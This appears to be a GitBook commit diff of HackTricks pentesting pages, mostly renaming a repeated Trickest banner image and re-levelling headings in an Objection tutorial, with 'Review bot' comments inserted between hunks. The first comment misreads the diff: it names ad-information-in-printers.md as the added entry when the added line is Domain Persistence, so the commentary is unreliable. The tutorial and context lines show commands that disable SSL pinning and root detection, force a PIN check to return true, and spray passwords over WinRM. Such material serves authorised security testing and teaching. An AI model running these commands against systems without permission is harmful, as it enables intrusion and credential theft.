GitBook: [#3440] No subject
BIN  .gitbook/assets/image (1) (1) (2).png  (Normal file)  After: Size 84 KiB
     Before: Size 84 KiB  After: Size 143 KiB
     Before: Size 143 KiB  After: Size 154 KiB
BIN  .gitbook/assets/image (2) (1) (2).png  (Normal file)  After: Size 51 KiB
     Before: Size 51 KiB  After: Size 76 KiB
     Before: Size 76 KiB  After: Size 178 KiB
BIN  .gitbook/assets/image (70) (1).png  (Normal file)  After: Size 98 KiB
     Before: Size 98 KiB  After: Size 71 KiB
BIN  .gitbook/assets/image (73) (1).png  (Normal file)  After: Size 14 KiB
     Before: Size 14 KiB  After: Size 197 KiB
BIN  .gitbook/assets/image (78) (1).png  (Normal file)  After: Size 10 KiB
     Before: Size 10 KiB  After: Size 132 KiB
BIN  .gitbook/assets/image (8) (2).png  (Normal file)  After: Size 126 KiB
     Before: Size 126 KiB  After: Size 96 KiB
BIN  .gitbook/assets/image (81) (1).png  (Normal file)  After: Size 49 KiB
     Before: Size 49 KiB  After: Size 37 KiB
     Before: Size 154 KiB  After: Size 48 KiB
|
@ -159,6 +159,7 @@
|
|||
* [AD Certificates](windows-hardening/active-directory-methodology/ad-certificates.md)
|
||||
* [Account Persistence](windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md)
|
||||
* [Domain Escalation](windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md)
|
||||
* [Domain Persistence](windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md)
|
||||
* [Certificate Theft](windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md)
|
||||
* [AD information in printers](windows-hardening/active-directory-methodology/ad-information-in-printers.md)
|
||||
* [ASREPRoast](windows-hardening/active-directory-methodology/asreproast.md)
|
||||
|
|
|
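Review bot: the new SUMMARY entry links to `windows-hardening/active-directory-methodology/ad-information-in-printers.md`, but no hunk in this diff adds or renames that file, so confirm the page already exists in the tree (or include it in this commit) before merging; otherwise the table-of-contents entry points at nothing. Its placement between Certificate Theft and ASREPRoast matches the ordering of the surrounding entries.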
@ -1,7 +1,7 @@
|
|||
# Linux Forensics
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
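Review bot: the banner's image reference moves from `image.png` to `image (1).png`, an auto-numbered GitBook asset name that other pages already use; the collision shows up elsewhere in this same commit, where unrelated `![]()` and `<figure>` references get bumped to `image (1) (1).png`, `image (70) (1).png`, `image (73) (1).png`, `image (78) (1).png` and `image (81) (1).png`, and the new-file list at the top carries `image (1) (1) (2).png`. Give the banner a stable, descriptive asset name (for example `trickest-banner.png`, a suggested name, not one present in the repo) so that future uploads stop renaming unrelated screenshots. The same comment applies to every other `{% hint style="danger" %}` hunk in this commit, which are byte-for-byte copies of this one; since the block is pasted at up to five places per file, any later edit to it has to touch every copy.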
@ -168,7 +168,7 @@ ThisisTheMasterSecret
|
|||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -233,7 +233,7 @@ find /sbin/ –exec rpm -qf {} \; | grep "is not"
|
|||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -376,7 +376,7 @@ usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid
|
|||
More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -466,7 +466,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Brute Force - CheatSheet
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -84,7 +84,7 @@ python3 cupp.py -h
|
|||
* [**https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm**](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm)
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -441,7 +441,7 @@ crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
|
|||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -641,7 +641,7 @@ crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
|
|||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -808,7 +808,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Python Sandbox Escape & Pyscript
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -51,7 +51,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Bypass Python sandboxes
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../../.gitbook/assets/image.png)
|
||||
![](<../../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -322,7 +322,7 @@ with (a as b):
|
|||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../../.gitbook/assets/image.png)
|
||||
![](<../../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -710,7 +710,7 @@ You can check the output of this script in this page:
|
|||
{% endcontent-ref %}
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../../.gitbook/assets/image.png)
|
||||
![](<../../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -1118,7 +1118,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../../.gitbook/assets/image.png)
|
||||
![](<../../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# venv
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -62,7 +62,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Web Requests
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -142,7 +142,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Search Exploits
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -85,7 +85,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Docker Basics & Breakout
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../../.gitbook/assets/image.png)
|
||||
![](<../../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -124,7 +124,7 @@ tar -zcvf private_keys_backup.tar.gz ~/.docker/trust/private
|
|||
When I changed Docker host, I had to move the root keys and repository keys to operate from the new host.
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../../.gitbook/assets/image.png)
|
||||
![](<../../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -254,7 +254,7 @@ docker run -it --security-opt=no-new-privileges:true nonewpriv
|
|||
For more **`--security-opt`** options check: [https://docs.docker.com/engine/reference/run/#security-configuration](https://docs.docker.com/engine/reference/run/#security-configuration)
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../../.gitbook/assets/image.png)
|
||||
![](<../../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -397,7 +397,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../../.gitbook/assets/image.png)
|
||||
![](<../../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Useful Linux Commands
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -148,7 +148,7 @@ sudo chattr -i file.txt #Remove the bit so you can delete it
|
|||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -327,7 +327,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Android Applications Pentesting
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -63,7 +63,7 @@ adb pull /data/app/com.android.insecurebankv2- Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk
|
|||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -246,7 +246,7 @@ An application may contain secrets (API keys, passwords, hidden urls, subdomains
|
|||
{% endcontent-ref %}
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -496,7 +496,7 @@ Probably you know about this kind of vulnerabilities from the Web. You have to b
|
|||
* [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/#cookies-flags)
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -687,7 +687,7 @@ python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
|
|||
|
||||
### [MARA Framework](https://github.com/xtiankisutsa/MARA\_Framework)
|
||||
|
||||
![](<../../.gitbook/assets/image (81).png>)
|
||||
![](<../../.gitbook/assets/image (81) (1).png>)
|
||||
|
||||
**MARA** is a **M**obile **A**pplication **R**everse engineering and **A**nalysis Framework. It is a tool that puts together commonly used mobile application reverse engineering and analysis tools, to assist in testing mobile applications against the OWASP mobile security threats. Its objective is to make this task easier and friendlier to mobile application developers and security professionals.
|
||||
|
||||
|
@ -705,7 +705,7 @@ It is able to:
|
|||
Useful to detect malware: [https://koodous.com/](https://koodous.com)
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -802,7 +802,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# Objection Tutorial
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
|
||||
# **Introduction**
|
||||
## **Introduction**
|
||||
|
||||
[![objection](https://github.com/sensepost/objection/raw/master/images/objection.png)](https://github.com/sensepost/objection)
|
||||
|
||||
|
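Review bot: demoting `# **Introduction**` to `## **Introduction**` is the right level under the `# Objection Tutorial` page title, but the bold markers inside the heading are redundant (headings are already emphasised) and render as `<strong>` nested in `<h2>`; use plain `## Introduction` while this line is being changed anyway.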
@ -27,11 +26,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
**Note:** This is not some form of jailbreak / root bypass. By using `objection`, you are still limited by all of the restrictions imposed by the applicable sandbox you are facing.
|
||||
|
||||
## Resume
|
||||
### Resume
|
||||
|
||||
The **goal** of **objection** is let the user call the **main actions that offers Frida**. **Otherwise**, the user will need to create a **single script for every application** that he wants to test.
|
||||
|
||||
# Tutorial
|
||||
## Tutorial
|
||||
|
||||
For this tutorial I am going to use the APK that you can download here:
|
||||
|
||||
|
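Review bot: `### Resume` is a false cognate; the section is a summary, so `### Summary` is what an English reader expects. Since this heading is being touched, the context line right below it has two grammar slips worth fixing in the same change: `is let the user call` should be `is to let the user call`, and `the main actions that offers Frida` should be `the main actions that Frida offers`.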
@ -39,13 +38,13 @@ For this tutorial I am going to use the APK that you can download here:
|
|||
|
||||
Or from its [original repository ](https://github.com/asvid/FridaApp)(download app-release.apk)
|
||||
|
||||
## Installation
|
||||
### Installation
|
||||
|
||||
```
|
||||
pip3 install objection
|
||||
```
|
||||
|
||||
## Connection
|
||||
### Connection
|
||||
|
||||
Make a **regular ADB conection** and **start** the **frida** server in the device (and check that frida is working in both the client and the server).
|
||||
|
||||
|
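Review bot: the `pip3 install objection` block sits in a bare fence while the later command blocks in this file use ```bash; tag it the same way for consistent highlighting. Also `conection` in the Connection paragraph should be `connection`.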
@ -55,11 +54,11 @@ If you are using a **rooted device** it is needed to select the application that
|
|||
objection --gadget asvid.github.io.fridaapp explore
|
||||
```
|
||||
|
||||
## Basic Actions
|
||||
### Basic Actions
|
||||
|
||||
Not all possible commands of objections are going to be listed in this tutorial, only the ones that I have found more useful.
|
||||
|
||||
### Environment
|
||||
#### Environment
|
||||
|
||||
Some interesting information (like passwords or paths) could be find inside the environment.
|
||||
|
||||
|
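Review bot: two typos sit in the context lines of this hunk and could go in the same change: `objections` should be `objection` in `Not all possible commands of objections`, and `could be find inside the environment` should be `could be found inside the environment`.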
@ -69,7 +68,7 @@ env
|
|||
|
||||
![](<../../../.gitbook/assets/image (64).png>)
|
||||
|
||||
### Frida Information
|
||||
#### Frida Information
|
||||
|
||||
```
|
||||
frida
|
||||
|
@ -77,58 +76,58 @@ frida
|
|||
|
||||
![](<../../../.gitbook/assets/image (65).png>)
|
||||
|
||||
### Upload/Download
|
||||
#### Upload/Download
|
||||
|
||||
```bash
|
||||
file download <remote path> [<local path>]
|
||||
file upload <local path> [<remote path>]
|
||||
```
|
||||
|
||||
### Import frida script
|
||||
#### Import frida script
|
||||
|
||||
```bash
|
||||
import <local path frida-script>
|
||||
```
|
||||
|
||||
### SSLPinning
|
||||
#### SSLPinning
|
||||
|
||||
```bash
|
||||
android sslpinning disable #Attempts to disable SSL Pinning on Android devices.
|
||||
```
|
||||
|
||||
### Root detection
|
||||
#### Root detection
|
||||
|
||||
```bash
|
||||
android root disable #Attempts to disable root detection on Android devices.
|
||||
android root simulate #Attempts to simulate a rooted Android environment.
|
||||
```
|
||||
|
||||
### Exec Command
|
||||
#### Exec Command
|
||||
|
||||
```bash
|
||||
android shell_exec whoami
|
||||
```
|
||||
|
||||
### Screenshots
|
||||
#### Screenshots
|
||||
|
||||
```bash
|
||||
android ui screenshot /tmp/screenshot
|
||||
android ui FLAG_SECURE false #This may enable you to take screenshots using the hardware keys
|
||||
```
|
||||
|
||||
## Static analysis made Dynamic
|
||||
### Static analysis made Dynamic
|
||||
|
||||
In a real application we should know all of the information discovered in this part before using objection thanks to **static analysis**. Anyway, this way maybe you can see **something new** as here you will only have a complete list of classes, methods and exported objects.
|
||||
|
||||
This is also usefull if somehow you are **unable to get some readable source code** of the app.
|
||||
|
||||
### List activities, receivers and services
|
||||
#### List activities, receivers and services
|
||||
|
||||
```
|
||||
android hooking list activities
|
||||
```
|
||||
|
||||
![](<../../../.gitbook/assets/image (78).png>)
|
||||
![](<../../../.gitbook/assets/image (78) (1).png>)
|
||||
|
||||
```
|
||||
android hooking list services
|
||||
|
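Review bot: the heading demotion is applied consistently here (`####` for every action), but the fences within this one hunk are mixed: Upload/Download, Import, SSLPinning, Root detection, Exec Command and Screenshots use ```bash while `android hooking list activities` and `android hooking list services` use bare fences; pick one. The screenshot rename `image (78).png` to `image (78) (1).png` is a side effect of the banner asset numbering (see the banner hunks), not an intended edit to this page, so check the screenshot still renders. Typo in context: `usefull` should be `useful`.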
@ -137,15 +136,15 @@ android hooking list receivers
|
|||
|
||||
Frida will launch an error if none is found
|
||||
|
||||
### Getting current activity
|
||||
#### Getting current activity
|
||||
|
||||
```
|
||||
android hooking get current_activity
|
||||
```
|
||||
|
||||
![](<../../../.gitbook/assets/image (73).png>)
|
||||
![](<../../../.gitbook/assets/image (73) (1).png>)
|
||||
|
||||
### Search Classes
|
||||
#### Search Classes
|
||||
|
||||
Lets start looking for classes inside our application
|
||||
|
||||
|
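Review bot: `Frida will launch an error if none is found` should read `Frida will throw an error if none is found`, and `Lets start looking` needs its apostrophe (`Let's`); the `image (73).png` to `image (73) (1).png` rename here is the same collateral asset renumbering noted on the other hunks.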
@ -155,7 +154,7 @@ android hooking search classes asvid.github.io.fridaapp
|
|||
|
||||
![](<../../../.gitbook/assets/image (69).png>)
|
||||
|
||||
### Search Methods of a class
|
||||
#### Search Methods of a class
|
||||
|
||||
Now lets extract the methods inside the class _MainActivity:_
|
||||
|
||||
|
@ -163,9 +162,9 @@ Now lets extract the methods inside the class _MainActivity:_
|
|||
android hooking search methods asvid.github.io.fridaapp MainActivity
|
||||
```
|
||||
|
||||
![](<../../../.gitbook/assets/image (70).png>)
|
||||
![](<../../../.gitbook/assets/image (70) (1).png>)
|
||||
|
||||
### List declared Methods of a class with their parameters
|
||||
#### List declared Methods of a class with their parameters
|
||||
|
||||
Lets figure out wich parameters does the methods of the class need:
|
||||
|
||||
|
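Review bot: `Lets figure out wich parameters does the methods of the class need` should be `Let's figure out which parameters the methods of the class need`; the `image (70).png` to `image (70) (1).png` rename is again collateral and should be verified against the new-file list at the top of the commit.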
@ -175,7 +174,7 @@ android hooking list class_methods asvid.github.io.fridaapp.MainActivity
|
|||
|
||||
![](<../../../.gitbook/assets/image (79).png>)
|
||||
|
||||
### List classes
|
||||
#### List classes
|
||||
|
||||
You could also list all the classes that were loaded inside the current applicatoin:
|
||||
|
||||
|
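Review bot: `applicatoin` in the context line should be `application`.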
@ -185,9 +184,9 @@ android hooking list classes #List all loaded classes, As the target application
|
|||
|
||||
This is very useful if you want to **hook the method of a class and you only know the name of the class**. You coul use this function to **search which module owns the class** and then hook its method.
|
||||
|
||||
## Hooking being easy
|
||||
### Hooking being easy
|
||||
|
||||
### Hooking (watching) a method
|
||||
#### Hooking (watching) a method
|
||||
|
||||
From the [source code](https://github.com/asvid/FridaApp/blob/master/app/src/main/java/asvid/github/io/fridaapp/MainActivity.kt) of the application we know that the **function** _**sum()**_ **from** _**MainActivity**_ is being run **every second**. Lets try to **dump all possible information** each time the function is called (arguments, return value and backtrace):
|
||||
|
||||
|
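Review bot: `You coul use this function` should be `You could use this function`, and the heading `### Hooking being easy` reads awkwardly; `### Hooking made easy` says the same thing. The `####` level for `Hooking (watching) a method` under it is consistent with the rest of the file.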
@ -197,7 +196,7 @@ android hooking watch class_method asvid.github.io.fridaapp.MainActivity.sum --d
|
|||
|
||||
![](<../../../.gitbook/assets/image (71).png>)
|
||||
|
||||
### Hooking (watching) an entire class
|
||||
#### Hooking (watching) an entire class
|
||||
|
||||
Actually I find all the methods of the class MainActivity really interesting, lets **hook them all**. Be careful, this could **crash** an application.
|
||||
|
||||
|
@ -209,7 +208,7 @@ If you play with the application while the class is hooked you will see when **e
|
|||
|
||||
![](<../../../.gitbook/assets/image (72).png>)
|
||||
|
||||
### Changing boolean return value of a function
|
||||
#### Changing boolean return value of a function
|
||||
|
||||
From the source code you can see that the function _checkPin_ gets a _String_ as argument and returns a _boolean_. Lets make the function **always return true**:
|
||||
|
||||
|
@ -219,7 +218,7 @@ Now, If you write anything in the text box for the PIN code you will see tat any
|
|||
|
||||
![](<../../../.gitbook/assets/image (77).png>)
|
||||
|
||||
## Class instances
|
||||
### Class instances
|
||||
|
||||
Search for and print **live instances of a specific Java class**, specified by a fully qualified class name. Out is the result of an attempt at getting a string value for a discovered objection which would typically **contain property values for the object**.
|
||||
|
||||
|
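Review bot: in the Class instances paragraph, `a discovered objection` should be `a discovered object` (this sentence is lifted from the tool's own help text, where it reads object), and `Out is the result` should be `Output is the result`. The hunk header's context line also carries `you will see tat any`, which should be `that`.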
@ -229,7 +228,7 @@ android heap print_instances <class>
|
|||
|
||||
![](<../../../.gitbook/assets/image (80).png>)
|
||||
|
||||
## Keystore/Intents
|
||||
### Keystore/Intents
|
||||
|
||||
You can play with the keystore and intents using:
|
||||
|
||||
|
@ -239,16 +238,16 @@ android intents launch_activity
|
|||
android intent launch_service
|
||||
```
|
||||
|
||||
## Memory
|
||||
### Memory
|
||||
|
||||
### Dump
|
||||
#### Dump
|
||||
|
||||
```bash
|
||||
memory dump all <local destination> #Dump all memory
|
||||
memory dump from_base <base_address> <size_to_dump> <local_destination> #Dump a part
|
||||
```
|
||||
|
||||
### List
|
||||
#### List
|
||||
|
||||
```
|
||||
memory list modules
|
||||
|
@ -264,7 +263,7 @@ Lets checks what is frida exporting:
|
|||
|
||||
![](<../../../.gitbook/assets/image (68).png>)
|
||||
|
||||
### Search/Write
|
||||
#### Search/Write
|
||||
|
||||
You can alse search and write inside memory with objection:
|
||||
|
||||
|
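Review bot: `You can alse search and write` should be `You can also search and write`.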
@ -273,23 +272,22 @@ memory search "<pattern eg: 41 41 41 ?? 41>" (--string) (--offsets-only)
|
|||
memory write "<address>" "<pattern eg: 41 41 41 41>" (--string)
|
||||
```
|
||||
|
||||
## SQLite
|
||||
### SQLite
|
||||
|
||||
You cals can use the command `sqlite` to interact with sqlite databases.
|
||||
|
||||
## Exit
|
||||
### Exit
|
||||
|
||||
```
|
||||
exit
|
||||
```
|
||||
|
||||
# What I miss in Objection
|
||||
## What I miss in Objection
|
||||
|
||||
* The hooking methods sometimes crashes the application (this is also because of Frida).
|
||||
* You can't use the instaces of the classes to call functions of the instance. And you can't create new instances of classes and use them to call functions.
|
||||
* There isn't a shortcut (like the one for sslpinnin) to hook all the common crypto methods being used by the application to see cyphered text, plain text, keys, IVs and algorithms used.
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
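Review bot: several typos in the context lines of this hunk are worth fixing while the headings change: `You cals can use` looks like `You can also use`, `instaces` should be `instances`, `sslpinnin` should be `sslpinning`, and `The hooking methods sometimes crashes` should be `sometimes crash`. The demotion of `# What I miss in Objection` to `##` matches the rest of the file.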
@ -305,5 +303,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Android APK Checklist
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -97,7 +97,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# 8086 - Pentesting InfluxDB
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
